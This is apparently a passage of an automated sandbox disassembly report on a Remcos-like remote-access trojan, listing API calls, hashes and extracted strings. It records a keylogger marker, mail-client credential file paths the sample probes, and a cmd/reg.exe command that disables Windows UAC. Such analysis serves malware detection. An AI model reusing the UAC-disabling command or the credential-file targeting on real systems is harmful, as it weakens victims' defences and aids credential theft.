                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ControlManager
                                          • String ID:
                                          • API String ID: 221034970-0
                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                          APIs
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                          • API String ID: 4036392271-1520055953
                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                          APIs
                                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                          • wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimewsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                          • API String ID: 1497725170-248792730
                                          • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                          • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: X8p
                                          • API String ID: 0-3665062877
                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSizeSleep
                                          • String ID: XQG
                                          • API String ID: 1958988193-3606453820
                                          • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                          • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                          Strings
                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: KeepAlive | Disabled
                                          • API String ID: 2993684571-305739064
                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                          APIs
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm triggered
                                          • API String ID: 614609389-2816303416
                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                          Strings
                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                          • API String ID: 3024135584-2418719853
                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 0044943D
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 2180151492-0
                                          • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                          • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                          • __freea.LIBCMT ref: 0045129D
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                          • _free.LIBCMT ref: 0044F43F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                          • _free.LIBCMT ref: 100071B8
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                          Memory Dump Source
